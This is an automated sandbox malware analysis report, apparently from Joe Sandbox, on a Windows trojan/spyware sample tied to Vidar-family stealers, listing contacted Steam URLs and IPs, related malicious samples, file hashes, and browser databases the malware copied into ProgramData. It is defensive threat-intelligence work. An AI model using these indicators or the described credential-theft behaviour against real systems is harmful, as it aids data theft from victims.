                    https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17InstallFIIDBK.1.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchAFBFHD.1.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pMSBuild.exe, 00000001.00000002.2045233748.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://steamcommunity.com/workshop/MSBuild.exe, 00000001.00000002.2045233748.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://steamcommunity.com/profiles/76561199689717899/badgesMSBuild.exe, 00000001.00000002.2045233748.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://store.steampowered.com/legal/MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.sqlite.org/copyright.html.MSBuild.exe, 00000001.00000002.2048308496.000000001336C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2054500004.000000001930D000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.1.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=tuNiaSwXwcYT&amp;l=englMSBuild.exe, 00000001.00000002.2045233748.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=GfSjbGKcNYaQ&amp;l=76561199689717899[1].htm.1.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://steamcommunity.com/profiles/76561199689717899/inventory/MSBuild.exe, 00000001.00000002.2045233748.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://sectigo.com/CPS0SecuriteInfo.com.Win32.Malware-gen.198.6512.exefalse
                    • URL Reputation: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/css/skin_1/profilev2.css?v=gNE3gksLVEVa&amp;l=enMSBuild.exe, 00000001.00000002.2045233748.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpgMSBuild.exe, 00000001.00000002.2045233748.0000000001066000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2045233748.000000000117E000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2045233748.00000000010D9000.00000004.00000020.00020000.00000000.sdmp, ECGIII.1.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://www.google.com/images/branding/product/ico/googleg_lodp.icoAFBFHD.1.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/css/globalv2.css?v=pwVcIAtHNXwg&amp;l=english&amMSBuild.exe, 00000001.00000002.2045233748.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/css/applications/community/main.css?v=Hpc3R3GOITMSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/css/skin_1/header.css?v=vh4BMeDcNiCU&amp;l=engliMSBuild.exe, 00000001.00000002.2045233748.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • URL Reputation: safe
                    		unknown
                    http://upx.sf.netAmcache.hve.4.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://store.steampowered.com/76561199689717899[1].htm.1.drfalse
                    • URL Reputation: safe
                    		unknown

                    World Map of Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public IPs

                    IPDomainCountryFlagASNASN NameMalicious
                    23.199.218.33
                    		steamcommunity.comUnited States
                    		16625AKAMAI-ASUStrue
                    78.47.123.174
                    		unknownGermany
                    		24940HETZNER-ASDEfalse

                    General Information

                    Joe Sandbox version:40.0.0 Tourmaline
                    Analysis ID:1447066
                    Start date and time:2024-05-24 10:26:11 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 8m 57s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:12
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:SecuriteInfo.com.Win32.Malware-gen.198.6512.exe
                    Detection:MAL
                    Classification:mal100.troj.spyw.evad.winEXE@9/32@1/2
                    EGA Information:
                    • Successful, ratio: 100%
                    HCA Information:
                    • Successful, ratio: 96%
                    • Number of executed functions: 132
                    • Number of non-executed functions: 208
                    Cookbook Comments:
                    • Found application associated with file extension: .exe

                    Warnings

                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                    • Excluded IPs from analysis (whitelisted): 40.126.32.138, 40.126.32.72, 40.126.32.133, 40.126.32.136, 40.126.32.134, 20.190.160.22, 40.126.32.68, 20.190.160.20, 93.184.221.240, 192.229.221.95, 20.189.173.22, 40.127.169.103, 52.165.164.15, 20.114.59.183, 20.3.187.198
                    • Excluded domains from analysis (whitelisted): prdv4a.aadg.msidentity.com, ctldl.windowsupdate.com.delivery.microsoft.com, slscr.update.microsoft.com, www.tm.v4.a.prd.aadg.akadns.net, wu.ec.azureedge.net, onedsblobprdwus17.westus.cloudapp.azure.com, ctldl.windowsupdate.com, wu.azureedge.net, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, login.live.com, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, ocsp.edge.digicert.com, blobcollector.events.data.trafficmanager.net, glb.cws.prod.dcat.dsp.trafficmanager.net, hlb.apr-52dd2-0.edgecastdns.net, sls.update.microsoft.com, umwatson.events.data.microsoft.com, wu-b-net.trafficmanager.net, www.tm.lg.prod.aadmsa.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
                    • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size exceeded maximum capacity and may have missing disassembly code.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryAttributesFile calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.

                    Simulations

                    Behavior and APIs

                    TimeTypeDescription
                    04:26:59API Interceptor1x Sleep call for process: SecuriteInfo.com.Win32.Malware-gen.198.6512.exe modified
                    04:27:09API Interceptor1x Sleep call for process: MSBuild.exe modified
                    04:27:13API Interceptor1x Sleep call for process: WerFault.exe modified

                    Joe Sandbox View / Context

                    IPs

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    23.199.218.33http://steamcommunici.com/profiles/76567410475250301Get hashmaliciousUnknownBrowse
                      https://mobile-sides-vertical-2.xv2.us/Get hashmaliciousUnknownBrowse
                        https://steam.poweredcommunityart.com/artwork/?id=8513444218Get hashmaliciousUnknownBrowse
                          file.exeGet hashmaliciousCryptOne, VidarBrowse
                            78.47.123.174BI6oo9z4In.exeGet hashmaliciousCryptOne, Djvu, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro StealerBrowse
                              file.exeGet hashmaliciousVidarBrowse
                                file.exeGet hashmaliciousVidarBrowse
                                  SecuriteInfo.com.Trojan.PWS.Steam.37259.28451.11337.exeGet hashmaliciousCryptOne, VidarBrowse
                                    a6lzHWp4pa.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                                      file.exeGet hashmaliciousVidarBrowse
                                        file.exeGet hashmaliciousVidarBrowse
                                          file.exeGet hashmaliciousVidarBrowse
                                            file.exeGet hashmaliciousVidarBrowse
                                              file.exeGet hashmaliciousVidarBrowse

                                                Domains

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                steamcommunity.comBI6oo9z4In.exeGet hashmaliciousCryptOne, Djvu, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro StealerBrowse
                                                • 104.102.42.29
                                                file.exeGet hashmaliciousVidarBrowse
                                                • 104.102.42.29
                                                https://steamcommunnittly.com/gift/activation/feor37565hFh6dseGet hashmaliciousUnknownBrowse
                                                • 104.102.42.29
                                                dfzesJIgdr.exeGet hashmaliciousRedLine, VidarBrowse
                                                • 23.197.127.21
                                                http://steamcommunici.com/profiles/76567410475250301Get hashmaliciousUnknownBrowse
                                                • 92.122.104.90
                                                file.exeGet hashmaliciousVidarBrowse
                                                • 23.197.127.21
                                                SecuriteInfo.com.Trojan.PWS.Steam.37259.28451.11337.exeGet hashmaliciousCryptOne, VidarBrowse
                                                • 23.197.127.21
                                                a6lzHWp4pa.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                                                • 23.195.238.96
                                                file.exeGet hashmaliciousVidarBrowse
                                                • 23.197.127.21
                                                file.exeGet hashmaliciousVidarBrowse
                                                • 23.197.127.21
                                                fp2e7a.wpc.phicdn.netSecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeGet hashmaliciousLummaC, PureLog StealerBrowse
                                                • 192.229.221.95
                                                http://18.158.249.75Get hashmaliciousUnknownBrowse
                                                • 192.229.221.95
                                                BI6oo9z4In.exeGet hashmaliciousCryptOne, Djvu, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro StealerBrowse
                                                • 192.229.221.95
                                                https://perspectivefunnel.co/664fc385b6e1a200142f71ee/664fc45e205ea60014803d49/Get hashmaliciousUnknownBrowse
                                                • 192.229.221.95
                                                https://pub-a2527e0fc1774b399011ecd14755d452.r2.dev/0nlinedoc.htmlGet hashmaliciousHTMLPhisherBrowse
                                                • 192.229.221.95
                                                run.jsGet hashmaliciousUnknownBrowse
                                                • 192.229.221.95
                                                http://qyt8pi.krestologs.comGet hashmaliciousUnknownBrowse
                                                • 192.229.221.95
                                                SecuriteInfo.com.PUA.Tool.RemoteControl.18.25736.20264.exeGet hashmaliciousRMSRemoteAdminBrowse
                                                • 192.229.221.95
                                                SecuriteInfo.com.PUA.Tool.RemoteControl.18.25736.20264.exeGet hashmaliciousRMSRemoteAdminBrowse
                                                • 192.229.221.95
                                                http://birchflarechurch.comGet hashmaliciousUnknownBrowse
                                                • 192.229.221.95

                                                ASNs

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                AKAMAI-ASUSBI6oo9z4In.exeGet hashmaliciousCryptOne, Djvu, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro StealerBrowse
                                                • 104.102.42.29
                                                Job Description (LM HR Division II).pdf .scr.exeGet hashmaliciousUnknownBrowse
                                                • 23.47.168.24
                                                https://deref-mail.com/mail/client/j_iGygdK9BI/dereferrer/?redirectUrl=Get hashmaliciousUnknownBrowse
                                                • 23.212.88.20
                                                https://shop.ketochow.xyz/Get hashmaliciousUnknownBrowse
                                                • 2.19.122.221
                                                http://02.jie888.link/Get hashmaliciousUnknownBrowse
                                                • 69.192.160.133
                                                http://port01-2i9.pages.dev/Get hashmaliciousUnknownBrowse
                                                • 2.17.22.50
                                                http://iykdkk.pages.dev/Get hashmaliciousUnknownBrowse
                                                • 2.17.22.50
                                                http://tan112131.studio.site/Get hashmaliciousUnknownBrowse
                                                • 2.19.120.150
                                                http://testing-1g0.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                                                • 23.211.10.95
                                                https://mariobadescu.tyb.xyz/Get hashmaliciousUnknownBrowse
                                                • 2.19.122.221
                                                HETZNER-ASDEA2G6pO40qG.exeGet hashmaliciousCMSBruteBrowse
                                                • 95.217.39.117
                                                BI6oo9z4In.exeGet hashmaliciousCryptOne, Djvu, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro StealerBrowse
                                                • 78.47.123.174
                                                https://deref-mail.com/mail/client/j_iGygdK9BI/dereferrer/?redirectUrl=Get hashmaliciousUnknownBrowse
                                                • 136.243.25.83
                                                http://simxtrackredirecttszz.pages.dev/Get hashmaliciousUnknownBrowse
                                                • 136.243.43.25
                                                http://testing-1g0.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                                                • 116.202.167.155
                                                http://amht38eh3e3f98ox0ld1rc4h3fjcowz98ldjp5hek8.pages.dev/Get hashmaliciousUnknownBrowse
                                                • 195.201.57.90
                                                kHVbLb16yu.htaGet hashmaliciousMetasploitBrowse
                                                • 144.76.219.54
                                                file.exeGet hashmaliciousVidarBrowse
                                                • 78.47.123.174
                                                Client.exeGet hashmaliciousAsyncRATBrowse
                                                • 168.119.211.236
                                                https://lnk.sk/mzoyGet hashmaliciousUnknownBrowse
                                                • 94.130.224.58

                                                JA3 Fingerprints

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                51c64c77e60f3980eea90869b68c58a8BI6oo9z4In.exeGet hashmaliciousCryptOne, Djvu, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro StealerBrowse
                                                • 78.47.123.174
                                                file.exeGet hashmaliciousVidarBrowse
                                                • 78.47.123.174
                                                file.exeGet hashmaliciousVidarBrowse
                                                • 78.47.123.174
                                                SecuriteInfo.com.Trojan.PWS.Steam.37259.28451.11337.exeGet hashmaliciousCryptOne, VidarBrowse
                                                • 78.47.123.174
                                                a6lzHWp4pa.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                                                • 78.47.123.174
                                                file.exeGet hashmaliciousVidarBrowse
                                                • 78.47.123.174
                                                file.exeGet hashmaliciousVidarBrowse
                                                • 78.47.123.174
                                                file.exeGet hashmaliciousVidarBrowse
                                                • 78.47.123.174
                                                file.exeGet hashmaliciousVidarBrowse
                                                • 78.47.123.174
                                                37f463bf4616ecd445d4a1937da06e19BI6oo9z4In.exeGet hashmaliciousCryptOne, Djvu, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro StealerBrowse
                                                • 23.199.218.33
                                                Offer Document 25.lnkGet hashmaliciousUnknownBrowse
                                                • 23.199.218.33
                                                nF54KOU30R.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                • 23.199.218.33
                                                DNSBench.exeGet hashmaliciousUnknownBrowse
                                                • 23.199.218.33
                                                DNSBench.exeGet hashmaliciousUnknownBrowse
                                                • 23.199.218.33
                                                kam.cmdGet hashmaliciousGuLoaderBrowse
                                                • 23.199.218.33
                                                zap.cmdGet hashmaliciousGuLoader, XWormBrowse
                                                • 23.199.218.33
                                                xff.cmdGet hashmaliciousGuLoader, XWormBrowse
                                                • 23.199.218.33
                                                las.cmdGet hashmaliciousGuLoaderBrowse
                                                • 23.199.218.33
                                                zap.cmdGet hashmaliciousGuLoader, XWormBrowse
                                                • 23.199.218.33

                                                Dropped Files

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                C:\ProgramData\AFCBAEBAEBFH\freebl3.dllBI6oo9z4In.exeGet hashmaliciousCryptOne, Djvu, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro StealerBrowse
                                                  file.exeGet hashmaliciousVidarBrowse
                                                    btCbrSS2Je.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                      7urUz64I0Y.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                        file.exeGet hashmaliciousVidarBrowse
                                                          SecuriteInfo.com.Trojan.PWS.Steam.37259.28451.11337.exeGet hashmaliciousCryptOne, VidarBrowse
                                                            a6lzHWp4pa.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                                                              file.exeGet hashmaliciousVidarBrowse
                                                                file.exeGet hashmaliciousVidarBrowse
                                                                  file.exeGet hashmaliciousVidarBrowse
                                                                    C:\ProgramData\AFCBAEBAEBFH\mozglue.dllBI6oo9z4In.exeGet hashmaliciousCryptOne, Djvu, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro StealerBrowse
                                                                      file.exeGet hashmaliciousVidarBrowse
                                                                        btCbrSS2Je.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                          7urUz64I0Y.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                            file.exeGet hashmaliciousVidarBrowse
                                                                              SecuriteInfo.com.Trojan.PWS.Steam.37259.28451.11337.exeGet hashmaliciousCryptOne, VidarBrowse
                                                                                a6lzHWp4pa.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                                                                                  file.exeGet hashmaliciousVidarBrowse
                                                                                    file.exeGet hashmaliciousVidarBrowse
                                                                                      file.exeGet hashmaliciousVidarBrowse

                                                                                        Created / dropped Files

                                                                                        C:\ProgramData\AFCBAEBAEBFH\AFBFHD

                                                                                        Download File
                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                        Category:dropped
                                                                                        Size (bytes):106496
                                                                                        Entropy (8bit):1.1358696453229276
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                        Malicious:false
                                                                                        Reputation:high, very likely benign file
                                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\ProgramData\AFCBAEBAEBFH\CBGCAF

                                                                                        Download File
                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                        File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                        Category:dropped
                                                                                        Size (bytes):5242880
                                                                                        Entropy (8bit):0.037963276276857943
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
                                                                                        MD5:C0FDF21AE11A6D1FA1201D502614B622
                                                                                        SHA1:11724034A1CC915B061316A96E79E9DA6A00ADE8
                                                                                        SHA-256:FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
                                                                                        SHA-512:A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
                                                                                        Malicious:false
                                                                                        Reputation:high, very likely benign file
                                                                                        Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\ProgramData\AFCBAEBAEBFH\CBGCAF-shm

                                                                                        Download File
                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):32768
                                                                                        Entropy (8bit):0.017262956703125623
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                        MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                        SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                        SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                        SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                        Malicious:false
                                                                                        Reputation:high, very likely benign file
                                                                                        Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\ProgramData\AFCBAEBAEBFH\ECGIII

                                                                                        Download File
                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                        File Type:ASCII text, with very long lines (1809), with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):9571
                                                                                        Entropy (8bit):5.536643647658967
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:qnaRt+YbBp6ihj4qyaaX86KKkfGNBw8DJSl:yegqumcwQ0
                                                                                        MD5:5D8E5D85E880FB2D153275FCBE9DA6E5
                                                                                        SHA1:72332A8A92B77A8B1E3AA00893D73FC2704B0D13
                                                                                        SHA-256:50490DC0D0A953FA7D5E06105FE9676CDB9B49C399688068541B19DD911B90F9
                                                                                        SHA-512:57441B4CCBA58F557E08AAA0918D1F9AC36D0AF6F6EB3D3C561DA7953ED156E89857FFB829305F65D220AE1075BC825F131D732B589B5844C82CA90B53AAF4EE
                                                                                        Malicious:false
                                                                                        Reputation:moderate, very likely benign file
                                                                                        Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696333830);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

                                                                                        C:\ProgramData\AFCBAEBAEBFH\FIIDBK

                                                                                        Download File
                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                        Category:dropped
                                                                                        Size (bytes):159744
                                                                                        Entropy (8bit):0.7873599747470391
                                                                                        Encrypted:false
                                                                                        SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                        MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                        SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                        SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                        SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\ProgramData\AFCBAEBAEBFH\FIJECA

                                                                                        Download File
                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                        Category:dropped
                                                                                        Size (bytes):114688
                                                                                        Entropy (8bit):0.9746603542602881
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\ProgramData\AFCBAEBAEBFH\HDAAAA

                                                                                        Download File
                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                        Category:dropped
                                                                                        Size (bytes):40960
                                                                                        Entropy (8bit):0.8553638852307782
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\ProgramData\AFCBAEBAEBFH\IEHCBA

                                                                                        Download File
                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                        Category:dropped
                                                                                        Size (bytes):28672
                                                                                        Entropy (8bit):2.5793180405395284
                                                                                        Encrypted:false
                                                                                        SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                        MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                        SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                        SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
